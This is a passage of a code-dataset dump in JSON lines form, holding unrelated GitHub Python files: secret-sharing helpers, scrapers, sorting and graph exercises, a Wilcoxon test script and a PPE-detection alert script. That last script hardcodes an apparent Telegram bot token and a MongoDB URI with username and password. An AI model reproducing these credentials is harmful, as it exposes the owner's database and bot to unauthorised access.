split_secret(data, threshold, num_points)\n\ndef recover_splits(splits):\n return points_to_secret_int(splits)\n\ndef enc_part_secret(publickey, split):\n enc_data = Public.encrypt(split, publickey)\n return enc_data\n\ndef dec_part_secret(privatekey, enc_data, number):\n split = Private.decrypt(enc_data, privatekey)\n if split:\n return (number + 1, int.from_bytes(split, byteorder=\"big\"))\n\n return None\n\ndef decode_random(encoded_splits, private_keys):\n splits = []\n count = min(len(encoded_splits), len(private_keys))\n for i in range(count):\n split = encoded_splits[i]\n private_key = private_keys[i]\n split = dec_part_secret(private_key, split, i)\n if split:\n splits.append(split)\n assert splits, \"No split parts decoded for shared random\"\n return recover_splits(splits)\n\ndef encode_splits(splits, public_keys):\n encoded_splits = []\n for i in range(0, len(splits)):\n public_key = public_keys[i]\n if public_key:\n encoded_split = enc_part_secret(public_key, splits[i])\n encoded_splits.append(encoded_split)\n \n return encoded_splits\n","repo_name":"pandoraboxchain/prometheus-python","sub_path":"crypto/secret.py","file_name":"secret.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"43040731611","text":"from ...core.core_tools import check_json\nfrom spikeinterface.widgets.base import BackendPlotter\n\nclass SortingviewPlotter(BackendPlotter):\n backend = 'sortingview'\n backend_kwargs_desc = {\n \"generate_url\": \"If True, the figurl URL is generated and printed. Default is True\",\n \"figlabel\": \"The figurl figure label. Default None\"\n }\n default_backend_kwargs = {\n \"generate_url\": True,\n \"figlabel\": None\n }\n \n def make_serializable(*args):\n serializable_dict = check_json({i: a for i, a in enumerate(args[1:])})\n returns = ()\n for i in range(len(args) - 1):\n returns += (serializable_dict[i],)\n if len(returns) == 1:\n returns = returns[0]\n return returns\n\n def set_view(self, view):\n self.view = view\n\n\ndef generate_unit_table_view(unit_ids):\n import sortingview.views as vv\n ut_rows = [\n vv.UnitsTableRow(unit_id=u, values={})\n for u in unit_ids\n ]\n ut_columns = []\n v_units_table = vv.UnitsTable(rows=ut_rows, columns=ut_columns)\n return v_units_table\n","repo_name":"LorenFrankLab/spikeinterface","sub_path":"spikeinterface/widgets/sortingview/base_sortingview.py","file_name":"base_sortingview.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"73063212153","text":"import subprocess\nimport sys\n\n\ndef run_with_stdout(cmd):\n \"\"\"Execute command with output from the process sent to stdout\n :param: cmd: Command to execute\n :return: Return code of the process\n \"\"\"\n process = subprocess.run(\n cmd,\n stdout=sys.stdout,\n stderr=subprocess.STDOUT,\n shell=True\n )\n return process.returncode\n","repo_name":"itiviti-cpp-2021/local-environment","sub_path":"internal/util/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22194907358","text":"import functools\n\nlst=[\"shubham\",\"abcdefg\",\"joshi\"]\n\ndef check(a,b):\n if len(a)>len(b):\n return 1\n elif len(a)==len(b):\n return ord(a[0])-ord(b[0])\n else:\n return -1\n \n 
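# Aside (not in the original file): with functools.cmp_to_key, the comparator above is
# equivalent to sorting by the tuple (length, first character) with a plain key function.
# The line below assumes the same lst defined at the top of this file:
print(sorted(lst, key=lambda s: (len(s), s[0])))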
\nprint(sorted(lst,key=functools.cmp_to_key(check)))\n","repo_name":"joshishubham769/crossword","sub_path":"tst.py","file_name":"tst.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32437991701","text":"from scrapy import Spider, Request\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy_playwright.page import PageCoroutine\nfrom crawler.crawler.items import Product\nfrom scrapy.loader import ItemLoader\nfrom itemloaders.processors import TakeFirst, MapCompose, Join, Identity\nfrom w3lib.html import remove_tags\n\n\nclass ProductLoader(ItemLoader):\n default_input_processor = MapCompose(remove_tags)\n default_output_processor = Join()\n\n company_in = Identity()\n company_out = Identity()\n\n url_in = Identity()\n url_out = Identity()\n\n photo_out = TakeFirst()\n\n\nclass TestSpider(Spider):\n \"\"\"\n Test Spider to test selectors\n \"\"\"\n name ='Test'\n\n url ='https://www.adidas.ca/en/adicolor-classics-3-stripes-tee/HE9545.html'\n\n def start_requests(self):\n yield Request(TestSpider.url,\n self.parse,\n meta=dict(\n playwright=True,\n playwright_page_coroutines=[\n PageCoroutine('wait_for_selector', 'div#navigation-target-description p'),\n ]\n ))\n\n async def parse(self, response, **kwargs):\n l = ProductLoader(item=Product(), response=response)\n l.add_value('company', self.name)\n l.add_css('title', 'div[class*=sidebar-wrapper] h1[data-auto-id=product-title] span')\n l.add_css('subtitle', 'div[data-auto-id=product-category] span')\n l.add_css('price', 'div[class*=sidebar-wrapper] div[class*=product-price] div['\n 'class*=gl-price-item]')\n l.add_css('color', 'div[data-auto-id=color-chooser] h5::text')\n l.add_css('description', 'div#navigation-target-description p')\n l.add_value('url', response.url)\n l.add_css('photo', 'section[data-auto-id=image-viewer] img::attr(src)')\n return l.load_item()\n\n\nif __name__ == \"__main__\":\n from crawler.crawler import settings\n settings_dict = {}\n for st in dir(settings):\n if st.startswith('_'):\n continue\n settings_dict[st] = getattr(settings, st)\n process = CrawlerProcess(settings=settings_dict)\n process.crawl(TestSpider)\n process.start()\n\n\n\n","repo_name":"cara-mu/monestco","sub_path":"crawler/crawler/spiders/TestSpider.py","file_name":"TestSpider.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"11736862674","text":"class Eurovizio():\n def __init__(self,s):\n sor=s.split(\";\")\n self.ev=int(sor[0])\n self.orszag=sor[1]\n self.eloado=sor[2]\n self.cim=sor[3]\n self.helyezes=int(sor[4])\nlista=[]\nwith open(\"eurovizio.txt\", \"r\", encoding=\"utf-8\") as f:\n for i in f:\n lista.append(Eurovizio(i.strip()))\nf.close()\nprint(f\"Összesen {len(lista)} zeneszám van\")\n\nfor i in lista:\n if \"dream\" in i.cim.lower():\n print(f\"{i.eloado}: {i.cim}\")\n elif \"dream\" in i.cim.upper():\n print(f\"{i.eloado}: {i.cim}\")\n\norszag=input(\"Írj be egy országot: \")\ndb=0\nfor i in lista:\n if orszag==i.orszag:\n db+=1\nprint(f\"Összesen {db} alkalommal szerepelt az adott ország.\")\n\ndef pontszam(helyezes):\n return 101-helyezes\nlista_masodik=[]\nfor i in lista:\n if i.orszag==\"Magyarország\":\n lista_masodik.append(pontszam(i.helyezes))\nprint(f\"A magyarországi versenyzők átlagos pontszáma: 
{sum(lista_masodik)/len(lista_masodik):.2f}")","repo_name":"dominiknyikos/Python","sub_path":"Komplex 3/Prog/eurovizio.py","file_name":"eurovizio.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20663512004","text":"from django import template\nfrom instagram.utils import InstagramUtils\nfrom django.utils.translation import gettext_lazy as _\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_authorization_url():\n return InstagramUtils.get_authorization_url()\n\n\n@register.simple_tag\ndef get_latest_media(account_name):\n media = InstagramUtils.get_latest_media(account_name)\n if media is None:\n return {\n \"error_message\": _(\n \"Either an error occurred or there is no media to show\"\n )\n }\n else:\n return media\n","repo_name":"UTNkar/moore","sub_path":"src/instagram/templatetags/instagram_tags.py","file_name":"instagram_tags.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"95"} +{"seq_id":"22309256645","text":"# Merge Sort \n# Merge\n\nimport random\nimport sys\n\nsys.setrecursionlimit(10000)\n\ndef Merge(l, m, h):\n one = lis[l:m+1]\n two = lis[m+1:h+1] # only up to index h; slicing to the end would merge elements outside this segment\n\n flag = l\n\n while (len(one) != 0 and len(two) != 0):\n if one[0] <= two[0]:\n lis[flag] = one[0]\n one.pop(0)\n else:\n lis[flag] = two[0]\n two.pop(0)\n\n flag += 1\n\n if len(one) != 0:\n for item in one:\n lis[flag] = item\n flag += 1\n \n if len(two) != 0:\n for item in two:\n lis[flag] = item\n flag += 1\n\ndef MergeSort(l, h):\n if l < h:\n m = int((l+h)/2)\n \n MergeSort(l, m)\n MergeSort(m+1, h)\n Merge(l, m, h)\n\n\nlis = []\n\nfor i in range(9):\n lis.append(random.randint(0, 20))\n\nprint(lis)\nprint(sorted(lis))\nMergeSort(0, 8)\nprint(lis)","repo_name":"mihirsam/Data-Structure-And-Algorithm-Python","sub_path":"MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"43176245615","text":"from collections import deque\nimport heapq\n\nv, e = map(int, input().split())\nvisited = [0] * (v+1)\ngraph = [[] for _ in range(v+1)]\nMIN = 2147483647\n\nfor i in range(e):\n\n a, b, c = map(int, input().split())\n\n graph[a].append([c,a,b])\n graph[b].append([c,b,a])\n \ndef prim(graph, a):\n\n visited[a] = 1\n adj_edge = graph[a]\n heapq.heapify(adj_edge) # the heap keeps edges ordered by weight automatically\n dist = 0\n \n while adj_edge:\n \n weight, x, y = heapq.heappop(adj_edge)\n\n if visited[y] == 0: # lightest edge that reaches a still-unvisited vertex\n visited[y] = 1 # mark it visited\n dist += weight # add the edge weight to the total\n\n #print(graph[y])\n for e in graph[y]: # push the new vertex's edges to unvisited neighbours\n if visited[e[2]] == 0:\n heapq.heappush(adj_edge, e)\n\n return dist\n\nprint(prim(graph, 1))\n","repo_name":"Arkinee/BOJ","sub_path":"백준(1197).py","file_name":"백준(1197).py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
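A small self-contained sanity check for the Prim pattern used in 백준(1197).py above, swapping stdin for a fixed toy graph; the helper name and the test edges are invented for illustration:

import heapq

def mst_weight(n, edges, start=1):
    # edges come as (weight, u, v), the same shape the heap entries above use
    adj = {i: [] for i in range(1, n + 1)}
    for w, u, v in edges:
        adj[u].append((w, u, v))
        adj[v].append((w, v, u))
    visited, heap, total = {start}, list(adj[start]), 0
    heapq.heapify(heap)
    while heap:
        w, _, v = heapq.heappop(heap)
        if v not in visited:
            visited.add(v)   # lock the vertex in
            total += w       # and pay for the edge that reached it
            for e in adj[v]:
                if e[2] not in visited:
                    heapq.heappush(heap, e)
    return total

# MST of this 4-node graph is the edges 1-2 (1), 2-3 (2), 1-4 (3) -> total 6
print(mst_weight(4, [(1, 1, 2), (2, 2, 3), (4, 3, 4), (3, 1, 4), (5, 2, 4)]))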
 +{"seq_id":"74915235513","text":"from itertools import count\nfrom cv2 import merge\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom scipy.fftpack import diff\n\nclass Total_crawling():\n def __init__(self):\n # self.columns = [\"프로그램 명\",\"설명\",\"담당자 이름\",\"담당기관\",\"담당자 연락처\",\"신청자격\",\"신청방법\",\"연결 URL\"]\n pass\n \n ## initial variable setup\n def initial_setting(self,sitename,col_list):\n self.dic={}\n self.my_columns = col_list\n for col in self.my_columns:\n self.dic[col]=list()\n self.name_dic={\"담당기관\":[],\"담당자연락처\":[],\"연결URL\":[]}\n self.sitename = sitename\n\n\n ## fetch a program page and parse it\n def find_data(self,url,program_page=\"\"):\n self.html = requests.get(url+program_page).text\n self.htmlAll = bs(self.html,'html.parser')\n\n \n ## append row data to the dic and name_dic accumulators\n def col_append_data(self, df, site_name,siteNumber,siteURL, current_col=[], differ_col = []):\n for col in current_col:\n for value in df[col]:\n self.dic[col].append(value)\n if len(differ_col) != 0:\n for differ in differ_col:\n for _ in range(len(df[col])):\n self.dic[differ].append(\"\")\n for _ in range(len(df[current_col[0]].values)):\n self.name_dic[\"담당기관\"].append(site_name)\n self.name_dic[\"담당자연락처\"].append(siteNumber)\n self.name_dic[\"연결URL\"].append(siteURL)\n \n\n def dic_to_csv(self):\n sort_columns = list(self.my_columns)\n sort_columns.insert(3,\"담당기관\")\n sort_columns.insert(4,\"담당자연락처\")\n sort_columns.insert(-1,\"연결URL\")\n result_df = pd.DataFrame(self.dic)\n result_df = result_df[sort_columns]\n result_df.to_csv('./{}.csv'.format(self.sitename), sep=',', na_rep='NaN',encoding=\"utf-8-sig\", index=False)\n\n\n def sbsports(self):## 서부재활체육센터 (Seobu Rehabilitation Sports Center)\n sitename = \"서부재활체육센터\" \n my_columns = [\"프로그램명\",\"설명\",\"담당자이름\",\"신청자격\",\"신청방법\"]#,\"담당기관\",\"담당자연락처\",\"연결URL\"\n url = \"http://www.sbsports.or.kr/sub/wrcAble.do\"\n self.initial_setting(sitename,my_columns)\n self.find_data(url)\n siteNumber = self.htmlAll.find(\"ul\",{\"class\":\"clearfix\"}).find_all(\"li\")[1].text[5:-2]\n df_list = pd.read_html(self.html,header=0)\n # tb_name_list = [x.text.strip() for x in self.htmlAll.find_all(\"caption\")]\n\n for i in range(len(df_list)):#len(df_list)\n ## grab the current table's columns\n current_col = df_list[i].columns.tolist()\n for name in current_col:\n df_list[i]=df_list[i].rename({name:name.replace(\" \",\"\")},axis=1)\n current_col = df_list[i].columns.tolist()\n\n merge_cols = []## e.g. [\"참가요일\",\"시간\",\"회비\"] get merged into the 설명 column below\n for col in current_col:\n if col == \"비고\":\n current_col.remove(col)\n if col == \"구분\" or col == \"프로그램\":\n df_list[i]=df_list[i].rename({col:\"프로그램명\"},axis=1)\n current_col.remove(col)\n current_col.append(\"프로그램명\")\n if col == \"참가요일 및 시간\" or col == \"참가요일\":\n df_list[i]=df_list[i].rename({col:\"참가요일\"},axis=1)\n merge_cols.append(\"참가요일\")\n # current_col.remove(col)\n # current_col.append(\"참가요일\")\n current_col.remove(col)\n if col == \"정원\":\n current_col.remove(col)\n if col == \"프로그램.1\":\n current_col.remove(col)\n if col == \"대상\":\n df_list[i]=df_list[i].rename({col:\"신청자격\"},axis=1)\n current_col.remove(col)\n current_col.append(\"신청자격\")\n if col == \"시간\":\n merge_cols.append(\"시간\")\n if col == \"회비\":\n merge_cols.append(\"회비\")\n \n ## add the 설명 (description) column\n current_col.append(\"설명\")\n df_list[i]['설명'] =df_list[i][merge_cols].apply(lambda row: '; '.join(row.values.astype(str)), axis=1) ## values joined with semicolons\n \n inter_col = list(set(self.my_columns) & set(current_col))\n differ_col = list(set(self.my_columns).difference(current_col))\n\n self.col_append_data(df_list[i],sitename,siteNumber,url, current_col = inter_col, differ_col = differ_col)\n self.dic.update(self.name_dic)\n self.dic_to_csv()
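    # Note (annotation): the site scrapers in this class all follow the recipe shown in
    # sbsports above - fetch the page, pull its tables with pd.read_html, rename the
    # site-specific Korean headers onto the shared schema, merge the leftover columns into
    # the 설명 (description) field, then hand the matched (inter_col) and missing
    # (differ_col) column lists to col_append_data before writing out via dic_to_csv.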
\n \n \n def sbsd(self):# 서부산권장애인스포츠센터 (West Busan Sports Center for the Disabled)\n sitename = \"서부산권장애인스포츠센터\"\n my_columns = [\"프로그램명\",\"설명\",\"담당자이름\",\"신청자격\",\"신청방법\"]\n url = \"https://www.sbsd.kr/Home/\"\n self.initial_setting(sitename,my_columns)\n self.find_data(url)\n program_page = self.htmlAll.find(\"li\",{\"class\":\"cd1 cd1c4\"}).find(\"a\")[\"href\"].split(\"/\")[-1]\n self.find_data(url,program_page=program_page)\n siteNumber = \" \".join(self.htmlAll.find(\"address\",{\"class\":\"foot_in\"}).find(\"span\").text.split()[2:4])\n print(siteNumber)\n pages = self.htmlAll.find('nav',{\"class\":\"tabmenu\"}).find_all(\"li\",{\"class\":\"cd3\"})\n programURLs = []\n \n for elem in pages:\n programURLs.append(elem.find(\"a\")[\"href\"].split(\"/\")[-1]) ## page number\n for i in range(len(programURLs)):\n self.find_data(url,program_page = programURLs[i])\n initial_df = pd.read_html(self.html,header=0)[0]\n current_col = initial_df.columns.tolist()\n merge_cols = []\n for col in current_col:\n if col == \"프로그램\":\n initial_df = initial_df.rename({col:\"프로그램명\"},axis=1)\n current_col.remove(col)\n current_col.append(\"프로그램명\")\n if col == \"교육일\":\n current_col.remove(col)\n merge_cols.append(\"교육일\")\n if col == \"대상\":\n initial_df = initial_df.rename({col:\"신청자격\"},axis=1)\n current_col.remove(col)\n current_col.append(\"신청자격\")\n if col == \"시간\":\n current_col.remove(col)\n merge_cols.append(\"시간\")\n if col == \"사용료\":\n current_col.remove(col)\n merge_cols.append(\"사용료\")\n if col == \"정원\":\n current_col.remove(col)\n merge_cols.append(\"정원\")\n current_col.append(\"설명\")\n initial_df['설명'] =initial_df[merge_cols].apply(lambda row: '; '.join(row.values.astype(str)), axis=1) ## values joined with semicolons\n inter_col = list(set(self.my_columns) & set(current_col))\n differ_col = list(set(self.my_columns).difference(current_col))\n self.col_append_data(initial_df,sitename,siteNumber,url+programURLs[i], current_col = inter_col,differ_col=differ_col)\n # for col in current_col:\n # for value in initial_df[col]:\n # self.dic[col].append(value)\n # for _ in range(len(initial_df[current_col[0]].values)):\n # self.name_dic[\"담당기관\"].append(sitename)\n # self.name_dic[\"담당자연락처\"].append(siteNumber)\n # self.name_dic[\"연결URL\"].append(url)\n \n \n self.dic.update(self.name_dic)\n self.dic_to_csv()\n \n \n def bisco(self):# 부산한마음스포츠센터 (Busan Hanmaeum Sports Center)\n sitename = \"부산한마음스포츠센터\"\n my_columns = [\"프로그램명\",\"설명\",\"담당자이름\",\"신청자격\",\"신청방법\"]\n url = \"http://hmsports.bisco.or.kr\"\n self.initial_setting(sitename,my_columns)\n self.find_data(url)\n program_page = self.htmlAll.find_all(\"li\",{\"class\":\"mn_li1\"})[1].find(\"a\")[\"href\"]\n self.find_data(url,program_page=program_page)\n siteNumber = \"\"\n pages = self.htmlAll.find_all(\"ul\",{\"class\":\"depth2\"})[-1].find_all(\"a\")\n programURLs = [url[\"href\"] for url in pages]\n del programURLs[-1]## drop the 통합방과후학교 (integrated after-school) entry\n del programURLs[4]## drop the 실내골프연습장 (indoor golf range) entry\n del programURLs[2]## drop the 피트니스실 (fitness room) entry \n for purl in programURLs:\n self.find_data(url,program_page=purl)\n initial_df = pd.read_html(self.html,header=0)[0]\n current_col = initial_df.columns.tolist()\n merge_cols = [\"반\",\"교육일\",\"시간\"]\n for col in current_col:\n print(col)\n if col == \"프로그램\":\n initial_df = initial_df.rename({col:\"프로그램명\"},axis=1)\n current_col.remove(col)\n current_col.append(\"프로그램명\")\n if col == \"대상\":\n initial_df = initial_df.rename({col:\"신청자격\"},axis=1)\n current_col.remove(col)\n current_col.append(\"신청자격\")\n current_col.append(\"설명\")\n initial_df['설명'] =initial_df[merge_cols].apply(lambda row: '; '.join(row.values.astype(str)), axis=1) ## values joined with semicolons\n inter_col = list(set(self.my_columns) & set(current_col))\n differ_col = list(set(self.my_columns).difference(current_col))\n self.col_append_data(initial_df,sitename,siteNumber,url+purl, current_col = inter_col,differ_col=differ_col)\n self.dic.update(self.name_dic)\n self.dic_to_csv()\n\ns = Total_crawling()\n# s.sbsports()\n# 
s.sbsd()\ns.bisco()","repo_name":"Grayson1999/ACIN-crawling","sub_path":"method_crawling.py","file_name":"method_crawling.py","file_ext":"py","file_size_in_byte":10111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20632353677","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 21 04:40:56 2019\nThe program is tested and working correctly; in case of any issues, please contact jnikhil@seas.upenn.edu\nPackages and dependencies to install before the program runs: pandas, numpy, itertools \nPandas data frame properties are primarily used for large data operations\n\nTwo different definitions are given for the test statistic on Wikipedia and other sources. The program function returns the W statistic \nbased on both methods.\n\n@author: jnikhil\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nimport itertools as it\n\ndef wilcoxon_signed_rank_test(data_df):\n \n '''\n The function takes a pandas data frame and returns a dictionary mapping each pair of products\n to its Wilcoxon Signed Rank Test statistic. \n **It returns two different dictionaries, based on the definition of the test statistic from Wikipedia and from other university sources;\n both W statistics represent the same measure \n '''\n frame_cols = data_df.columns\n required_cols = frame_cols[2:]\n dict_pair_wiki = {}\n dict_pair_theory = {}\n \n for i in range(len(required_cols)):\n wtest_df = pd.DataFrame(columns = ['key', 'nonkey', 'abs_diff','sgn','rank','sgn_x_rank'])\n wtest_df['key'] = data_df.iloc[:,1]\n wtest_df['nonkey'] = data_df.iloc[:,i+2]\n wtest_df['abs_diff'] = abs(wtest_df['key'] - wtest_df['nonkey'])\n wtest_df['sgn'] = np.sign(wtest_df['key'] - wtest_df['nonkey'])\n wtest_df = wtest_df[(wtest_df[['abs_diff']] != 0).all(axis=1)]\n wtest_df = wtest_df.sort_values(by=['abs_diff'])\n wtest_df['rank'] = wtest_df['abs_diff'].rank(ascending=1) #ranked from lowest to highest, with tied ranks included where appropriate\n wtest_df['sgn_x_rank'] = wtest_df['sgn']*wtest_df['rank']\n negative_df = wtest_df[(wtest_df[['sgn_x_rank']] < 0).all(axis=1)]\n positive_df = wtest_df[(wtest_df[['sgn_x_rank']] > 0).all(axis=1)]\n nrank_sum = abs(negative_df['sgn_x_rank'].sum())\n prank_sum = positive_df['sgn_x_rank'].sum() \n \n # Wikipedia - W stat is the sum of all signed ranks \n dict_pair_wiki.update({(frame_cols[1],frame_cols[i+2]):wtest_df['sgn_x_rank'].sum()})\n \n # other sources - W stat is the min of the sum of negative ranks and the sum of positive ranks\n dict_pair_theory.update({(frame_cols[1],frame_cols[i+2]):min(nrank_sum,prank_sum)})\n \n return (dict_pair_wiki,dict_pair_theory) \n\n\ndef permu_n_weights(data_df):\n \n '''\n This function calculates the weighted permutations, i.e. the combinations of products to be compared, and returns a new data frame. \n It uses 100% equal weighting to calculate the weighted combination of the columns of products to be compared. The function also returns the\n list of combinations along with the new data frame. 
\n '''\n \n all_columns = data_df.columns\n nonkey_cols = all_columns[2:]\n prod_combinations = []\n \n for i in range(len(nonkey_cols)-1):\n prod_combinations.extend(list(it.combinations(nonkey_cols, i+2))) \n \n for element in prod_combinations:\n sum = 0\n col_name = \"W_\"\n for sub in element:\n S = sub\n sum = sum+data_df[S]\n col_name = col_name + sub + \"_\"\n col_name = col_name[:-1]\n data_df[col_name] = sum/(len(element))\n \n PerW_df = data_df.drop(nonkey_cols, axis=1) \n \n return (prod_combinations,PerW_df)\n\n\ndef main():\n \n '''\n The data file is always assumed to be having first column as identifier, second as a 'main Product'\n and remaining columns are products to be compared\n '''\n \n data_df = pd.read_excel('Algodata.xlsx', sheet_name='Data')\n data_df = data_df.drop_duplicates(subset='Customer', keep=\"last\")\n # Removes the duplicate customers if any \n \n dict_pair_wiki,dict_pair_theory = wilcoxon_signed_rank_test(data_df)\n \n print(\"\\nKey and Non Key product pair with W test (Wikipedia Defination):\\n\")\n #print(dict_pair_wiki)\n for index, (key, value) in enumerate(dict_pair_wiki.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n print(\"\\nKey and Non Key product pair with W test (Book Defination):\\n\")\n #print(dict_pair_theory)\n for index, (key, value) in enumerate(dict_pair_theory.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n prod_comb,PerW_df= permu_n_weights(data_df)\n pw_pair_wiki,pw_pair_theory = wilcoxon_signed_rank_test(PerW_df)\n \n print(\"\\nNumber of Product Combinations:\\n\")\n print(len(prod_comb))\n \n print(\"\\nProduct Combinations:\\n\")\n print((prod_comb))\n \n print(\"\\nKey and Non key combination with W test (Wikipedia Defination):\\n\")\n #print(pw_pair_wiki)\n for index, (key, value) in enumerate(pw_pair_wiki.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n print(\"\\nKey and Non key combination with W test (Book Defination):\\n\")\n #print(pw_pair_theory)\n for index, (key, value) in enumerate(pw_pair_theory.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n bestfit_nonkey = min(dict_pair_wiki, key=lambda y: abs(dict_pair_wiki[y]))\n print(\"\\nBest Fit non key product:\\n\")\n print(bestfit_nonkey) #Best fit non key product for which pair has least absolute W stat \n # The value is near to zero or postive and negative are approx.equal \n \n print(\"\\nBest Fit non key product combinations:\\n\")\n bestfit_pernw = min(pw_pair_wiki, key=lambda y: abs(pw_pair_wiki[y]))\n print(bestfit_pernw) # Best fit combination for which test statisitc is near to zero or least among all\n \nif __name__ == \"__main__\":\n main()","repo_name":"NikhilJPENN/Wilcoxon-signed-rank-test","sub_path":"wrtest_pandas.py","file_name":"wrtest_pandas.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38029974336","text":"import face_recognition\nimport cv2\nimport numpy as np\nfrom pymongo.mongo_client import MongoClient\nfrom ultralytics import YOLO\nimport threading\nimport time\nfrom datetime import datetime\nimport collections\nfrom collections import Counter\nimport os\nimport asyncio\nfrom telegram import Bot\nimport httpx\nimport base64\n\nasync def send_message(bot_token, chat_id, name, breach, image, location, breach_id):\n base64_image = base64.b64encode(image).decode('utf-8') # Decode base64 to string\n \n retries = 
3\n for attempt in range(1, retries + 1):\n try:\n async with httpx.AsyncClient(timeout=httpx.Timeout(timeout=5.0)) as client:\n response = await client.post(\n f\"https://api.telegram.org/bot{bot_token}/sendPhoto\",\n data={\"chat_id\": chat_id},\n files={\"photo\": (\"image.jpg\", image, \"image/jpeg\")},\n params = {\n \"caption\": (\n f\"Breach number:{breach_id} \\n\\n\"\n f\"{name} was not wearing a {breach}\\n\"\n f\"Location of breach: {location}\\n\"\n f\"Time of breach: {datetime.now()}\"\n )\n }\n )\n print(f\"Response Status Code: {response.status_code}\")\n break # Break the loop if the request succeeds\n except (httpx.ConnectError, httpx.ReadError, httpx.TimeoutException) as exc:\n print(f\"Failed attempt {attempt}/{retries}: {exc}\")\n if attempt == retries:\n print(\"Request failed after maximum retries\")\n break\n else:\n print(\"Retrying...\") \n continue \n\n#Telegram Bot token and Chat ID (Astro's Chat ID)\nbot_token = '6060060457:AAGRyic-1HVFcUy1dSEsdLMJo0rB9Mvz0y0'\nchat_id = '1629576653'\n\nuri = \"mongodb+srv://loctientran235:PUp2XTv7tkArDjJB@c290.5lmj4xh.mongodb.net/?retryWrites=true&w=majority\"\n# Create a new client and connect to the server\ndb_client = MongoClient(uri)\ndb = db_client[\"construction\"]\ncollection = db[\"encodings_test3\"]\ncollection2 = db[\"db_breaches_2\"]\n\n# Send a ping to confirm a successful connection\ntry:\n db_client.admin.command('ping')\n print(\"Pinged your deployment. You successfully connected to MongoDB!\")\nexcept Exception as e:\n print(e)\n\nstop_event = threading.Event() \n\nemployee_data = None\n\nai_model = YOLO('ai_model\\\\ppe_model.pt')\n# ai_model = YOLO('D:/Workspace/Flask-Server/ai_server/ai_model/ppe_model.pt')\n\nphoto_path = \"UI_photos\\\\\"\n# photo_path = 'D:/Workspace/Flask-Server/ai_server/UI_photos/'\n\nimgBackground = cv2.imread(photo_path + 'background.png')\nmodel = cv2.imread(photo_path + 'pageA.png')\nclear_text = cv2.imread(photo_path + 'clear.png')\nclear_text2 = cv2.imread(photo_path + 'clear2.png')\n\n#avaList\nfolderAvaPath = photo_path + 'Ava'\navaPathList = os.listdir(folderAvaPath)\nimgAvaList = []\nfor path in avaPathList:\n imgAvaList.append(cv2.imread(os.path.join(folderAvaPath, path)))\n\n#ppeList\nfolderPpePath = photo_path + 'ppe'\nppePathList = os.listdir(folderPpePath)\nimgPpeList = []\nfor path in ppePathList:\n imgPpeList.append(cv2.imread(os.path.join(folderPpePath, path)))\n\ndef train_encoding(image_url):\n image = face_recognition.load_image_file(image_url)\n name = image_url.split(\".\")[0]\n encoding = face_recognition.face_encodings(image)[0]\n object_encoding = encoding.astype(object)\n result = np.insert(object_encoding, 0, name)\n return result\n\ndef save_encodings(encoding):\n # convert the array to BSON\n encoding_list = encoding.tolist()\n collection.insert_one({\"encode\": encoding_list})\n\ndef retrieve_encoding():\n # retrieve all the documents from the collection\n encoding_data = collection.find()\n\n # create a list to store the encodings\n encoding_list = []\n for encoding in encoding_data:\n num_vals = encoding['encode'][1:]\n detect_name = encoding['encode'][0]\n encode_np = np.array(num_vals)\n encoding_list.append((detect_name, encode_np))\n \n return encoding_list \n\ndef update_employee(name):\n collection = db[\"workers\"]\n global employee_data\n employee_data = collection.find_one({\"name\": name})\n print(employee_data)\n \ndef search_data_thread(name):\n thread = threading.Thread(target=update_employee, args=(name,))\n thread.start()\n return 
thread\n\ndef alert_process(breach_ppe, most_frequent_name, worker_breaches):\n alert_message = \"[ALERT]\\nWorker Name:\" + most_frequent_name + \" is not wearing the proper PPE!\\nTimestamp: \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n #asyncio.run(send_message(bot_token, chat_id, alert_message))\n \n # Check the length of the list before appending\n initial_length = len(worker_breaches)\n\n new_breach = {\"Workername\": most_frequent_name, \"Breach\": breach_ppe}\n\n # # Check if the new breach already exists for the same workername with any breach\n # if any(breach[\"Workername\"] == new_breach[\"Workername\"] for breach in worker_breaches):\n # existing_breaches = {breach[\"Breach\"] for breach in worker_breaches if breach[\"Workername\"] == new_breach[\"Workername\"]}\n # print(existing_breaches)\n \n # # Check if the new breach is a duplicate for the same workername\n # if not new_breach[\"Breach\"] in existing_breaches:\n # worker_breaches.append(new_breach)\n # else:\n # worker_breaches.append(new_breach)\n\n # Check if workername already exists\n if not any(breach[\"Workername\"] == 